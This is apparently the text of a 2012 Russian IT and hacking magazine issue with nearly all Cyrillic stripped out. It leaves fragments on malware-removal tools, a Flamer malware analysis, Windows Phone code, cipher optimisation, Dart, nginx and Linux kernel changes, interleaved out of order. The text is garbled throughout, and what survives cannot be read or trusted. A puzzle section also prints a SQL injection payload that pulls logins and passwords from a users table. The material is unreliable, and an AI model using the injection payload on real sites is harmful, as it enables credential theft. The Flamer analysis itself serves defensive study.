08 /163/ 2012
,
,
API-
. ,
, hosts, , . .
, ,
- Autoruns
SisInternals.
(
, WinDbg)
,
.
advapi32.dll, ,
. ?
. 74
.
?
Process
Hacker Process
Explorer
. ?
. ?
.
?
Windows
,
.
, .
Task Manager, VBA Excel
(
Task Manager ),
Process Explorer Process Hacker.
.
Process Explorer
( , ).
,
,
, ()
(,
)
.
08 /163/ 2012
,
, Windows,
.
.
API- ,
API-
.
,
.
Process Hacker ,
,
.
,
(
,
).
075
MALWARE
.
TcpView SisInternals.
explorer.exe,
winlogon.exe, svchost.exe.
IP-?
? (: svchost.exe
winlogon.exe, winint.exe,
csrss.exe, lsass.exe )
API-
. ?
.
, , hosts, , . .
. (3)
.
?
, .
?
.
?
, ,
.
, -
?..
. msconfig,
,
HKCU\Software\Microsoft\Windows\CurrentVersion\Run HKLM\Software\
Microsoft\Windows\CurrentVersion\Run. ,
,
,
, Windows.
Autoruns SisInternals Suit.
, ,
. GUI, , . -
076
, ( Run, RunOnce,
) Internet Explorer
(BHO, ),
( 11.0).
, , . ,
API-, Autoruns
. , , ,
Autoruns - WinDbg,
, F5,
API-.
08 /163/ 2012
DVD
(, , )
RootkitRevealer
SysInternals.
.
( MFT Master File Table NTFS-
) ,
API-.
.
,
API-
.
,
API-.
BlackLight F-Secure
.
( PID).
+ ,
,
.
+
API-
Autoruns.
INFO
,
139-
,
WARNING
,
,
.
GMER. ,
, ,
.
, , ,
TCP/IP-.
- .
,
AVZ.
,
- .
, ,
.
GMER
08 /163/ 2012
,
(,
,
)
.
,
!
WWW
AVZ ,
, :
;
;
;
;
;
;
Winsock SPI/LSP-;
, ;
;
;
TCP/UDP-;
;
NTFS-;
.
, , .
, ( ,
, ) - ( ),
.
-
,
www.processlibrary.
com.
www.nobunkum.
ru/ru/rootkitswindbg
WinDbg
Esage
Lab.
www.esetnod32.
ru/.support/winlock,
sms.kaspersky.ru
www.drweb.
com/xperf/unlocker
.
077
MALWARE
, Symantec
FLAMER
,
!
W32.Flamer, sKyWIper,
Flame,
-
.
,
,
,
( ,
).
.
? , . , Flamer
,
- .
, .
078
,
Flamer ,
. , , ,
Flamer
- .
.
,
.
,
. , ,
. , ,
, , , , . ,
- .
28 2012 MAHER -
08 /163/ 2012
, !
, sKyWIper (www.crysys.hu/
skywiper-statement.html). (. 1.03), 62 (www.crysys.
hu/skywiper/skywiper.pdf), , , Duqu
Stuxnet,
C&C-,
.
, sKyWIper ,
Flame ( )
Flamer (MAHER).
Symantec
Flamer (www.
symantec.com/en/uk/security_response)
27.05.2012 19:00 (UTC).
Symantec Flamer
.
( ).
, ( ,
).
Flamer ,
, 2010 .
, .
.
, Flamer
Stuxnet .
Flamer ,
,
.
-, SQL
SSH.
Lua-,
.
Flamer
Microsoft Windows.
Flamer
.
,
, ,
autorun.inf. CVE-2010-2568,
Stuxnet, CVE-20102729. , Flamer (a man-in-the-middle, MITM),
Windows
Update.
,
MD5, ,
08 /163/ 2012
Microsoft Root Authority.
Flamer .
,
Flamer .
:
advnetcfg.ocx,
ccalc32.sys,
mssecmgr.ocx ,
msglu32.ocx,
boot32drv.sys,
nteps32.ocx.
advnetcfg.ocx.
2010 , 2011-.
ccalc32.sys
, , advnetcfg.ocx.
Flamer ,
. 150
, . 1. ,
,
.
Flamer , ,
-,
.
6 ,
20 . Lua-,
,
(). 62 , ,
C&C-
.
,
, .
Flamer, , mssecmgr.ocx.
, 3.
,
,
, mssecmgr.
ocx.
,
. ,
.1.
DLL- : advnetcfg.
ocx, nteps32.ocx, boot32drv.sys, msglu32.ocx,
soapr32.ocs, jimmy.dll, 00006411.dll .
, HTTP-, SOCKS-,
SSH, SQLite , , Lua-.
Lua ,
. , ,
,
. Lua
, Flamer.
mssecmgr.ocx , ,
.
-,
advnetcfg.ocx, ccalc32.sys.
ccalc32.sys RC4
128- .
ccalc32.sys, ,
Windows kernel32.dll,
.
advnetcfg.ocx , .
mssecmgr.ocx nteps32.
ocx advnetcfg.ocx,
nteps32.ocx shell32.dll.
( ) DLL ,
winlogon.exe
.
Windows , Windows:
HKEY_LOCAL_MACHINE\SYSTEM\Current
ControlSet\Control\Lsa\"Authentication
Packages" = "mssecmgr.ocx"
nteps32.ocx
mssecmgr.ocx Lua.
. (
FLAME.) -
079
MALWARE
.
.
( ,
):
ATTACKOP
;
CASAFETY ;
CRUISE ;
EUPHORIA LNK ;
BEETLEJUICE Bluetooth-;
SUICIDE Flamer ;
MUNCH HTTP-;
VIPER ;
FLASK ;
MICROBE ;
GATOR C&C-.
. ,
ATTACKOP soapr32.ocx.
,
RC4.
,
.
.
mssecmgr.ocx
~DEB93D.tmp,
Wiper,
. Wiper
.
Flamer.
,
.
,
-
. ,
.
Flamer USB-,
,
() .
Flamer .
Flamer -
080
.
,
:
, ,
;
Microsoft Windows Print
Spooler Service Remote Code Execution
Vulnerability (CVE-2010-2729), Stuxnet;
, autorun.
inf, Stuxnet;
, ,
USB-,
Microsoft Windows Shortcut 'LNK/PIF' Files
Automatic File Execution Vulnerability (CVE-20102568), Stuxnet;
Windows Update
(MITM).
,
,
, .
USB
Windows,
. , , C:\My\Very\Long\
Directory\Path,
C:\MyJunction,
.
. Flamer , .
,
, My Docs.
Flamer :
, ,
mssecmgr.ocx,
desktop.ini,
target.lnk.
Desktop.ini Windows,
. Flamer
ShellClassInfo desktop.ini,
.
,
.
Flamer
.
CLSID
ShellClassInfo.
CLSID My Docs
,
target.lnk,
.
,
My Docs, Windows
Explorer, , , target.
lnk. ,
My Docs, target.lnk
desktop.ini,
Flamer (mssecmgr.ocx).
Flamer
.
Flamer
. .lnk
, Flamer ( Stuxnet)
Microsoft Windows
Shortcut 'LNK/PIF' Files Automatic File Execution
Vulnerability (CVE-2010-2568). target.lnk, Flamer , ,
. , Windows
, ,
target.lnk (mssecmgr.ocx). Flamer .
1.
, ,
.
Flamer , , .
.
; ,
, . ,
, GPS- .
SQLight %Temp%
.
Sony Ericsson Nokia, Flamer .
08 /163/ 2012
, !
.2.
.3.
2. Windows
, .
3. Flamer lnk-, .
NetBIOS WPAD ,
.
wpad.dat, - ,
Flamer.
-
.
MUNCH -
Flamer,
. MUNCH
,
URL- Windows Update.
, MITM .
Windows Update ,
Microsoft. Flamer
, , Microsoft Root Authority
. Microsoft
Terminal Server Licensing.
Microsoft
Terminal Services Licensing,
Microsoft
Terminal Services.
Microsoft Enforced Licensing Intermediate
PCA, , ,
Microsoft Root Authority.
,
. Flamer
Microsoft.
( Microsoft
Security Advisory 2718704
, ,
.)
Windows XP, Windows
Vista Windows 7 Microsoft
Hydra.
08 /163/ 2012
, MD5.
,
MD5 ,
.
Flamer Windows
Update, GADGET MUNCH , ,
Microsoft.
, Windows Update.
Flamer, .
TumblerEXE.exe.
Tumbler
,
. Tumbler ,
,
, Flamer, HTTP
URL- :
[http://]MSHOME-<STRING>/view.php?mp=1&
jz=<STRING>&fd=<STRING>&am=<STRING>&ef=
<STRING>&pr=<STRING>&ec=<STRING>&ov=
<STRING>&dd=<STRING>
MUNCH Flamer
mssecmgr.
ocx, Tumbler %Windir%\
temp\~ZFF042.tmp .
.
Flamer.
BLUETOOTH
Flamer Windows, Bluetooth. BeetleJuice,
, .
,
.
Bluetooth-.
081
MALWARE
, ,
.
Bluetooth-. , ,
Flamer, ,
Bluetooth- .
Bluetooth- Flamer
description.
Bluetooth, .
,
Bluetooth-.
,
,
. Bluetooth-
,
.
(
/
) , .
C&C-
80 , C&C-,
, IP.
() .
2012 C&C-,
,
browse32.ocx, Flamer
.
09 2012 .
browse32.ocx :
1. EnableBrowser ,
(, ,
) .
2. StartBrowse ,
Flamer.
, Flamer.
,
, . ,
.
.
,
, Flamer
SUICIDE . ,
SUICIDE,
Flamer
.
,
,
, ,
(!)
.
! z
, FLAMER
:
( )
:
IP-
Gateway
Proxy
DHCP
DNS
Hosts
Wi-Fi
082
Microsoft Outlook
Remote Access Services
CoreFTP
CureFTP
EmFTP
FTP Explorer
Mssh
NetserveFTP
RAdmin
RoboFTP
Softx FTP
South River WebDrive
TeamViewer
VNC
:
Bluetooth,
:
MS Word
MS
PowerPoint
MS Excel
MS Publisher
Microsoft Outlook
Express
Microsoft Outlook
Microsoft
Outlook appointments
Microsoft Outlook
MS Visio
MS Access
AutoCAD
PDF-
JPEG
Bitmap
TIFF
PNG
GIF
URL-
CSV-
LNK-
ORA-
RDP-
RTF-
SSH-
SSH2-
TXT-
:
GPS-
GPS-
GPS-
:
Ace FTP
BitKinex
Bulletproof FTP
CyD FTP
Dameware
Innosetup
Intersoft SecureKeyAgent
Ipswitch WSFTP
JaSFTP
Jildi FTP
Netserve FTP
PenguiNet
RageWork
SecureCRT
SmartFTP
VNC
:
NetBIOS/SMB
Yahoo mail
Yahoo Rocketmail
Yahoo Maktoob
Gawab
Google mail
Microsoft Live
Microsoft Hotmail
,
.
08 /163/ 2012
Preview
90
,
,
,
. ,
.
, AES.
?
,
, .
84
UNIXOID
120
, Google, Ubuntu Linux 8-
.
08 /163/ 2012
UNIXOID
98
Dart, Google
JavaScript?
SYN/ACK
128
HOWTO ,
.
114
LINUX MINT
,
Distrowatch.com?
FERRUM
132
SSD
HDD
SSD
.
, ?
083
yurembo (yazevsoft@gmail.com)
084
08 /163/ 2012
Microsoft
.
,
256 .
512 .
.
, Windows Phone
,
Microsoft Windows
Phone.
API, , , . SDK (7.0)
.
.
1.
, . , . Visual Studio
2010, Windows Phone Application
Silverlight. . . :
VibrateController.Default.Start(TimeSpan.FromSeconds(5));
. , VibrateController.Default.Stop().
,
API . Microsoft.Devices;
, .
2.
. : . ,
:
FMRadio myRadio = FMRadio.Instance;
myRadio.CurrentRegion = RadioRegion.Europe;
myRadio.Frequency = 103.9; // ,
// , :)
myRadio.PowerMode = RadioPowerMode.On;
FMRadio .
, : Europe, Japan United States.
:). . .
( ?) ,
Windows Phone , .
, : myRadio.PowerMode
= RadioPowerMode.Off. ,
.
3.
Windows Phone ,
.
. , ,
( 1 1),
.
(
), , ,
.
, , , , , ,
, .
.
, :), : Microsoft.Xna.Framework Microsoft.
Device.Sensors (Project Add Reference). C#-
: Microsoft.Xna.
Framework, Microsoft.Devices.Sensors.
, . MainPage :
Accelerometer Acc = new Accelerometer().
. :
Acc.CurrentValueChanged += Acc_CurrentValueChanged.
TimeBetweenUpdates
, :
08 /163/ 2012
Acc.TimeBetweenUpdates = TimeSpan.FromMilliseconds(100).
, :
void Acc_CurrentValueChanged(object sender,
SensorReadingEventArgs<AccelerometerReading> e)
{
var position = e.SensorReading.Acceleration;
Dispatcher.BeginInvoke(() =>
{
xpos.Text = position.X.ToString("0.0");
ypos.Text = position.Y.ToString("0.0");
zpos.Text = position.Z.ToString("0.0");
});
}
position , ;
, .
Vector3.
( Dispatcher).
, Silverlight
:
. Dispatcher,
BackgroundWorker. Silverlight
Microsoft ( ), Bing :),
Windows Phone. ,
085
BeginInvoke , , .
( , ),
, ,
Dispatcher ( ,
).
,
, .
: Acc.Start().
: Acc.Stop().
,
, (. 1).
. 1.
4.
,
, ,
.
. C#-
, .
Accelerometer
Compass.
.
CurrentValueChanged:
void comp_CurrentValueChanged(object sender,
SensorReadingEventArgs<CompassReading> e)
{
var position = e.SensorReading.MagneticHeading;
Dispatcher.BeginInvoke(() =>
{
xpos.Text = position.ToString();
});
}
. .
, ; ,
.
, , ,
.
,
.
,
,
.
,
.
5. XML
XML ,
, Windows Phone .
, .NET.
, 7.5 XML-
.
, XML.
, , XML,
.
, - , -
086
,
,
.
, , , .
System.Xml
System.Xml.Serialization. : System.IO, System.IO.IsolatedStorage, System.Xml,
System.Xml.Serialization.
- -
08 /163/ 2012
- .
XML-
( -).
: . ,
, :
public class UserData
{
public string FirstName { get; set; }
public string LastName { get; set; }
public string NickName { get; set; }
}
,
. ,
, , .
,
UserData
:
var record = new UserData();
record.FirstName = textBox1.Text;
record.NickName = textBox3.Text;
record.LastName = textBox2.Text;
using (var store =
IsolatedStorageFile.GetUserStoreForApplication())
using (var file = store.CreateFile("data.xml"))
//
{
XmlSerializer ser = new XmlSerializer(typeof(UserData));
//
ser.Serialize(file, record);
// UserData
}
:
1. ,
.
2. XML- .
3.
, -.
4. , .
using, ,
.
.
, , IDisposable.
Dispose .
:
UserData record = null;
using (var store =
IsolatedStorageFile.GetUserStoreForApplication())
using (var file = store.OpenFile("data.xml", FileMode.Open))
{
XmlSerializer ser = new XmlSerializer(typeof(UserData));
var reader = XmlReader.Create(file);
if (ser.CanDeserialize(reader))
{
record = (UserData)ser.Deserialize(reader);
textBox1.Text = record.FirstName;
textBox2.Text = record.LastName;
textBox3.Text = record.NickName;
}
}
:
, ,
data.xml, , ,
. , ,
, Text .
. ,
. ,
.
6. JSON
JSON (JavaScript Object Notation) , XML,
,
,
.
JavaScript ( ),
. JSON
, XML, ,
UserData:
{ "FirstName" : "Yuriy", "LastName" : "Yazev",
"NickName" : "yurembo" }
, XML :).
:
JSON.
, ,
UserData. DataContractJsonSerializer,
08 /163/ 2012
JSON-,
SystemServicemodel.Web,
: System.IO, System.IO.IsolatedStorage, System.
Runtime.Serialization.Json. . - ,
.
:). -,
json
xml. ,
. -, XmlSerializer
DataContractJsonSerializer. -,
WriteObject Serialize.
, -, ReadObject Deserialize.
( ).
, / .
087
7.
Windows Phone 7.5,
. ,
,
Microsoft.
,
XML-,
, .
, Windows
Phone Microsoft SQL Server Compact.
.
. SQL Server
Transact-SQL, ADO.NET. LINQ.
Microsoft, LINQ
. SQL ?
? , SQL , ( 70- ) , . ,
( , ,
:)), . SQL
Server Compact: , .
- ,
.
. 2.
088
, .
,
MMOg. ,
: ,
, .
System.Data.Linq,
LINQ. .
: ,
Visual Studio ,
XAP-
. , , ,
. ,
, ,
?
Tools Connect to Database. , Microsoft SQL Server Compact 3.5,
Add Connection. Connection Properties
Database
sdf (. 2).
Create
, .
, K, .
, Server Explorer
. , Tables
Create Table.
(. 3).
,
ID, . Server Explorer
Players Table Properties.
Add Relations, Relation Name
(, ID_REL), Primary Key Table
(Users), Foreign Key Table
,
. 3. Users
08 /163/ 2012
,
, ,
Visual Studio. .
VS Solution Explorer, ,
Add Existing Item.
(gameDB.cs).
:
.
, (Get Data)
,
, (Insert Data)
.
, :
, ( )
( Players),
, ,
, .
, , ,
, , .
: try/catch.
WWW
www.microsoft.com
Windows Phone
.
DVD
,
:
string DBStr = "Data Source=isostore:/gameDB.sdf". . ,
GameDB IDbConnection.
, .
,
.
,
(TextBox),
. ,
. 5.
. 4. Players
08 /163/ 2012
Windows Phone:
SDK 7.1,
, , . , ,
, , :).
.
! ,
, .
! z
089
R_T_T
2814789
,
, . , , ,
. ,
.
,
. ,
,
, .
,
.
?
,
RTT- ;).
. 32- ,
.
32- . ,
32-
?
, , ,
.
, ,
090
,
12 RTT-. ! ,
, .
,
, , 1 RTT-.
,
, .
, ,
, .
100%, (
1 RTT). 100%-
1/12 .
, Windows , 1 12 RTT.
100%- - , , , !
, , .
, . ,
.
08 /163/ 2012
2814789
,
.
, .
, , ,
, ,
. ,
RTT.
2814789
.
.
( , ) . , ,
,
. ,
, ALU.
, ,
4060
. ,
.
. . 1.
. 1.2 ( )
32- ,
86/64 .
,
.
88
, ,
256- .
1024
(256 ). , 11
32- (
).
1 ( ).
( , . . 2).
(. 1.7),
,
. ,
, , ,
.
XOR, ,
.
, ,
. 1.
. 2.
(. 1.7).
(
), -
, .
, ,
1 RTT-.
2 RTT-.
2814789
.
,
.
,
.
- .
.
, - - .
(FPU, )
,
,
. , , ,
. ,
,
.
,
, 3264
. ,
,
. (
), .
, (),
FPU, . -
,
32-
08 /163/ 2012
091
,
.
,
. , .
, ,
, .
,
.
, . :
/, ,
.
,
. , , .
: , .
. 3.
. ,
. , , , .
. ,
, . 1
2.
,
.
, ,
.
( ),
MMX-. ( ) ,
.
, ,
, .
,
,
,
,
.
64- ,
( 16
!).
2 ( ).
, 2 RTT-. ,
.
( 1)
352 , 8 , ( 2) 416
, 16 . ,
80 144
3,6 .
092
. 3.
:
, 15% , , ,
, ,
Intel,
, .
.
AMD, .
,
.
, ,
,
.
SSE- AVX-
2814789
86/64
SSE 16 FPU ( )
.
,
, SSE-.
SSE-
16 . , SSE- .
,
SSE-. ,
SSE-.
AVX-.
, SSE-
,
, SSE-
.
SSE- . 4.
SSE ,
:
,
(APIC).
08 /163/ 2012
. 4. SSE-
. 5.
, .
SSE-
, ().
(
, - ).
. Intel . . 6. . 7
SSE-,
.
,
, .
FPU
, . 128
32 .
, ,
... !
, FPU SSE
.
, , ,
Q, D, W, B,
,
SSE.
SSE-
32- ; ,
P, D.
32 ,
.
, , 3, .
, ! FPU,
.
,
FPU
.
, -
.
SSE- FPU .
,
, SSE.
16 SSE--.
SSE- FPU, (. 5).
,
.
:
, .
, , , .
AVX.
,
. .
AVX VPSHUFB.
, , .
, ;
, -
08 /163/ 2012
. 6. Intel
093
4,
. , , ....
SSE- , FPU .
.
472
. ,
3,6 59 , 236
.
580
. ,
3,6 49 ,
392 .
, 3 4 RTT, 4 8 RTT. SSE-
, ,
. 20%-
.
AVX-, Intel,
AMD. AMD, .
, , :
AMD , XOP, ,
.
. ,
3 4, ,
: ,
.
, .
,
256- (YMM-),
. , ,
256- (FPU 128 ).
,
16 YMM- .
, , , 256- ,
16
.
600700 FPU
256 .
16 RTT, ,
.
. 12 RTT-,
,
FPU. Intel ,
, !
, , .
.
, . -
094
. 7.
. ,
, ,
.
50% ,
-, , 100
.
( 8 RTT),
. 500
, .
, ,
.
Intel, AMD
FPU ( ). ,
.
,
,
,
SSE- 12 RTT.
, , , AMD 12 RTT
. ,
.
?
, .
,
, , . ,
. , AES.
, , AES- ,
100150 , !
, ( 256 ).
86/64,
.
,
. 36 RTT , 12,5 RTT,
, , .
, - .
:
,
. ( )
, , , . z
08 /163/ 2012
(ivinside.blogspot.com)
,
1
,
.
. ,
?
, ,
!
. ,
, ,
.
. ,
,
.
. : ,
, . ,
, !
,
, .
.
,
.
. : , , .
. ,
! , .
100 .
99%.
98%. ?
: , , , /. .
096
, , teas:
.
. , , . 99%,
, 1%.
99 1 . 98%
2% . , , , . ,
2% - .
, 100% * * 50 . , ,
.
-
: ERROR at line 15: ORA-01790: expression must have
same datatype as corresponding expression.
?
?
,
? , ,
?
Oracle
SQL-, , MySQL
.
,
. , :
08 /163/ 2012
, . / , :
script.php?id=-1 union select 1,login,password,null,null,
null,null,null from USERS where id=1--
pCycle = true;
else
{
pCurrent->bVisited = true;
pCurrent = pCurrent->pNext;
}
}
,
. :
p1 = p2 = head;
( security
advisory), ,
.
.
securitylab.ru:
: 15.06.2012
:
:
: 1
CVSSv2 : 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVE ID:
:
:
:
: script.php victim.com
:
SQL- .
-
id script.php
:
,
?
, ,
.
. , , . , :
struct Node {
...
bool bVisited;
};
, ,
. , (bVisited == true).
, :
bool bCycle = false;
pCurrent = pHead;
while (pCurrent && !pCycle)
{
if (pCurrent->bVisited == true) // , !
08 /163/ 2012
do {
p1 = p1->next;
p2 = p2->next->next;
} while (p1 != p2);
p1 p2.
, p2 , p1.
, , p2 p1. ,
,
. z
1. . , ,
(
, ).
, , . .
, , ,
,
. .
?
2. , ,
. ,
- ,
( ,
), (
). ,
, ,
. .
, .
,
. ?
3. Cisco IOS.
. ( ),
.
:
.
4. .
,
.
. : IE6+, FF3.0+, Opera
9.5+, Chrome 4.0+.
097
Spider_NET (www.vr-online.ru)
:
?
GOOGLE
Google . ,
Noop ( ,
) Go (
). 2009
, ,
,
.
, Google ,
. (,
) , C# Microsoft Delphi
Embarcadero. Google
098
Google ,
.
:
,
. Dart.
,
. ,
, .
.
, ,
.
, -,
2009 . ,
Go Noop. ,
.
2010-,
:
JavaScript (Future of Javascript doc from our
internal JavaScript Summit).
,
web-.
.
Dash ( Dart)
,
.
?
-
, , .
PHP,
Python, Java, Ruby, ++,
JavaScript.
,
08 /163/ 2012
-, Dart JavaScript
.
,
.
, -,
,
JavaScript
, ,
, .
Google,
JavaScript
( , , )
,
.
,
.
JavaScript Dart, ,
.
:
.
JavaScript ,
, CoffeeScript jQuery.
Dart , ,
( ),
JavaScript .
.
.
.
HTML5 Flash
, ,
. -
08 /163/ 2012
Dart
- : ,
, ,
,
.
, ,
,
. , , ,
,
.
:
,
.
. , ,
, .
. Dart ,
jQuery.
, , ?
:
: Dart
, JavaScript
, ,
JavaScript jQuery,
.
, ,
.
Dart? Google
.
JavaScript,
2005-. JS ,
jQuery . ,
.
, Google
-
-
099
JavaScript- Dart ,
?
Dart
: , ,
? .
: , ?
: !
,
,
180 .
,
- .
Wave Buzz.
, ,
,
(Wave)
(
Buzz Google Plus).
.
: ;)
: Plus, Wave Buzz
, Dart . !
Dart , Google Web Toolkit
( ).
.
GWT -
enterprise.
HTML/CSS/
JavaScript.
Java,
MVC-.
GWT
JavaScript.
, .
Sunflower
100
Dart
Dart'
, ,
,
.
GWT .
. ( Google)
.
.
GWT ,
.
:
Flash,
,
.
,
80% Dart
.
Google Chrome Internet Explorer. Dart Chrome . Google
.
IE, Opera, Safari, FireFox?
,
Mozilla Opera Software, Apple
Microsoft ,
, .
, .
Dart IE
.
:
JavaScript. .
:
:
Dart
.
,
,
/.
Dart.
Spirodraw
08 /163/ 2012
: !
,
, Dart -
, ,
.
. Google ,
(HTML5, CSS3).
:
:
, JavaScript? Dart
(class oriented language).
, ,
C#, Delphi, Java.
- ,
Dart
. JavaScript . . ,
, ,
,
JS
.
Google ,
, :
. JavaScript
,
.
.
JavaScript,
( CoffeeScript), .
: - !
:
, -.
IDE,
JavaScript-. (, WebStorm), Open
Source (, Aptana studio).
( ). , ,
,
JavaScript.
.
?
: ,
:
,
Dart
( Chrome).
JavaScript
,
Dart , V8 (V8 JavaScript
engine). , .
. , -
, ,
, .
: ,
DART?
DART
Dart
(
Wikipedia ).
Google c 2004 . Dart Google Chrome. ,
( ). Dart .
( )
- Google.
08 /163/ 2012
Dart,
,
.
Dart ,
.
.
Dart ? :
.
, Dart ,
.
,
(
), ,
. z
goo.gl/xm9qK Dart;
goo.gl/LKtMW Dart.
,
Dart;
goo.gl/y3CvR ( Darta) Wikipedia;
goo.gl/0pyFH Dart Wikipedia;
www.dartlang.org/docs/language-tour/ Dart;
goo.gl/T49aK ( ) Dart
JavaScript;
code.google.com/webtoolkit - Google;
goo.gl/LtAm7 Dart.
101
.
-
,
,
, ,
,
.
, ,
, , Photosight.ru .
, .
102
08 /163/ 2012
. 2
, .
, :
,
,
.
. , ,
, ,
- .
, . ? ,
-, . ; , ,
, .
?
-,
,
. , nginx 10
keep-alive- 2,5 .
-
, ( , , , sendfile nginx).
( ) ,
. PHP- Perl
.
nginx
, . nginx 810 ,
mod_perl 200 .
, 16
40 mod_perl, .
, ,
CSS-, ,
. nginx (
) , ,
.
.
,
?
, Facebook.
, CSS- JavaScript-
.
-
, .
,
,
. ,
.
.
, .
,
.
, nginx (
: , , - (, , ),
.
08 /163/ 2012
103
Mongrel2, Ruby-.
Ruby- , . ,
- ,
. ,
.
. .
) (, URI
),
.
, , , nginx
.
nginx
.
,
. .
Nginx . ,
( , , ), .
-. , , URI- GET-.
.
.
,
.
nginx . proxy_cache_lock.
.
-. , , ,
.
104
,
, .
,
.
JavaScript-, .
,
- .
.
Facebook.
JavaScript.
,
.
Facebook
.
JavaScript, . ,
. ,
, :
,
.
, ,
. ,
Java-,
,
GWT (Google Web Toolkit).
Microsoft Web Forms,
JavaScript ,
.
:
.
,
-
JavaScript.
, , , .
3040 ,
, .
(upstreams), ,
.
.
.
, URI /messages/
, /photo/
,
.
08 /163/ 2012
. 2
.
- , ,
,
.
2. ,
(
LA
).
. LA
,
Gone Away (
).
,
,
.
.
,
, , (rbc.ru)
.
- .
, ,
GPRS,
, ,
, .
,
nginx.
nginx.
,
,
,
. -
, .
. ?
HIGHLOAD-
, , .
, ,
-. , . ,
.
:
I. ,
. :
1.
.
2. ,
.
3. ,
( ).
II. :
1. -
08 /163/ 2012
.
nginx
.
, .
, nginx
. (
,
nginx
nginx.)
, , .
, ,
,
, ,
.
.
.
,
nginx.
.
,
,
.
HighLoad++.
Erlang.
Erlyvideo.
,
MySQL. NoSQL
Tarantool.
-
,
.
105
, . ,
, .
,
, . . -
, .
, . , .
.
, .
, .
(
), ,
. , ,
.
- - . , ,
.
. .
, 2001 ,
. spylog.ru, DNS
, , www1.spylog.
ru, www2.spylog.ru, www3.spylog.ru.
- . IPVS, NAT. ,
, .
, ,
. .
,
ping. ,
.
. , ,
, .
, , .
.
DNS-
. , ,
DNS-, ,
, DNS.
TTL (
, ). -
, , , ,
.
, , ,
. TTL .
, . , ,
DNS- , IPVS,
.
-
. .
,
,
,
.
,
.
, .
IP-.
. ,
IP- .
CARP (
FreeBSD), Heartbeat ( Linux)
.
Rambler, , , .
DNS-,
,
.
.
. ,
upstream , .
.
- ,
upstream, ,
, .
,
, .
Nginx .
, ,
-,
. , ,
.
. ,
,
,
- .
, .
,
. z
, . ?
106
08 /163/ 2012
!
8-800-200-3-999
+7 (495) 663-82-77 ()
40 % .
6 1194 .
12 2149 .
6 810 .
12 1499 .
6 1110 .
12 1999 .
6 894 .
12 1699 .
6 564 .
13 1105 .
6 599 .
12 1188 .
6 1110 .
12 1999 .
6 810 .
12 1499 .
3 630 .
6 1140 .
6 895 .
12 1699 .
6 690 .
12 1249 .
6 775 .
12 1399 .
6 1110 .
12 1999 .
6 1110 .
12 1999 .
6 950 .
12 1699 .
shop.glc.ru
UNIXOID
(execbit.ru)
LINUX 3.0 3.4
Linux
.
,
Linux-,
, -.
,
?
108
08 /163/ 2012
3.0
Linux,
, , .
2.6
,
4.0 5.0.
, ,
API
, Linux
. 3.0 ,
2.6.40.
. ,
/ (2.5 , 2.6 ),
, .
X.Y.Z, X (
3), Y , Z , ,
.
3.0
. ,
,
, , .
.
08 /163/ 2012
,
2.6.11
2.6.12
2.6.13
2.6.14
2.6.15
2.6.16
2.6.17
2.6.18
2.6.19
2.6.20
2.6.21
2.6.22
2.6.23
2.6.24
2.6.25
2.6.26
2.6.27
2.6.28
2.6.29
2.6.30
2.6.31
2.6.32
2.6.33
2.6.34
2.6.35
2.6.36
2.6.37
2.6.38
2.6.39
3.0
3.1
3.2
389
566
545
553
612
709
736
815
801
673
767
870
912
1057
1123
1027
1021
1075
1180
1150
1166
1248
1196
1150
1187
1176
1276
1198
1258
1131
1168
1316
68
90
94
90
108
111
120
133
128
138
143
180
181
193
232
203
187
212
233
249
227
261
238
243
209
207
221
220
239
331
212
226
All
7944
855
Kernel Version
109
UNIXOID
UDP- 20%, RAW- 30%.
. Linux-
Wake on WLAN,
S3
.
, , .
BPF (Berkeley Packet Filter), , JIT- ,
, tcpdump Wireshark.
Btrfs.
,
. Btrfs ,
,
.
. btrfs filesystem defragment.
Btrfs , , ,
.
.
1520% b+ .
RAID- Btrfs
Quasi-round-robin,
, -
110
. .
3.0 9862 1276 , 44 ( 8002
, 7946 ). 41% , 25% , 15% , 5% 5%
.
08 /163/ 2012
,
Kernel Version
2.6.11
2.6.12
2.6.13
2.6.14
2.6.15
2.6.16
2.6.17
2.6.18
2.6.19
2.6.20
2.6.21
2.6.22
2.6.23
2.6.24
2.6.25
2.6.26
2.6.27
2.6.28
2.6.29
2.6.30
2.6.31
2.6.32
2.6.33
2.6.34
2.6.35
2.6.36
2.6.37
2.6.38
2.6.39
3.0
3.1
3.2
2005-03-02
2005-05-17
2005-08-28
2005-10-27
2006-01-02
2006-03-19
2006-06-17
2006-09-19
2006-11-29
2007-02-04
2007-04-25
2007-07-08
2007-10-09
2008-01-24
2008-04-16
2008-07-13
2008-10-09
2008-12-24
2009-03-23
2009-06-09
2009-09-09
2009-12-02
2010-02-24
2010-05-15
2010-08-01
2010-10-20
2011-01-04
2011-03-14
2011-05-18
2011-07-21
2011-10-24
2012-01-04
kernel.org
08 /163/ 2012
69
108
73
61
68
77
91
95
72
68
81
75
94
108
83
88
88
76
89
78
92
84
84
81
77
80
76
69
65
64
95
72
NFC,
, , , ,
, , . Android
NFC Ice Cream Sandwich.
3.1 Writeback,
, ,
,
-. RAID , bad-. ,
iSCSI target, Linux-iSCSI.org. Btrfs
,
. ext3 -
, ,
. , XFS, Btrfs ext4.
cpufrequtils
cpupowerutils. ,
cpufrequtils,
: , GPU CPU, .
. Xen dom0
VGA-, PCI- Memory hotplug
balloon, KVM
,
.
9403 1318 , 49 .
37% , 25% , 14% , 5%
5% .
111
UNIXOID
TPM.
3.2 99 , 40%
, 23% , 15%
, 3% , 4%
.
BTRFS
170 000
, 60 000
EXT4
3.2 ext4 1 .
.
,
1 1 .
1 mkfs
e2fsprogs 1.42.
3.2 Btrfs. 3.0
(
89 43 ).
'-o recovery'.
,
xfstests 445 28 .
RAID Device Mapper
(thin provisioning),
, . ,
,
. ,
,
,
.
EVM (extended verification
module), , ,
(, LiveCD), ,
3.3 , ,
Android.
, - Google
.
staging- , Google
.
Android , ashmem ,
;
Binder,
Android; ram console
,
; logcat , ; LMK
(low memory killer)
, , ;
gpio.
3.3 Linux , EFI (Extensible Firmware Interface),
. (), ASPM (Active State Power
Management),
, 2.6.38.
procfs hidepid, /proc/PID
. ,
gid, .
,
Teaming,
, .
:
round-robin active-backup. , libteam.
LINUX
1991
1992
1993
1996
1998
1999
...
Linux
Linux
GPL,
Slackware
,
Linux
IT-
Linux
Red Hat
112
08 /163/ 2012
net_prio cgroups,
SO_PRIORITY,
, .
,
, (latency) , ,
.
Open vSwitch, (][_05_2012).
3.3 15 ,
5,6 , 1,8
, 700 ,
533 , 493 .
. , . Chrome OS
.
Yama,
Canonical
Ubuntu. Yama
:
ptrace , ;
( /tmp) ;
, / , .
Yama .
3.4 Btrfs.
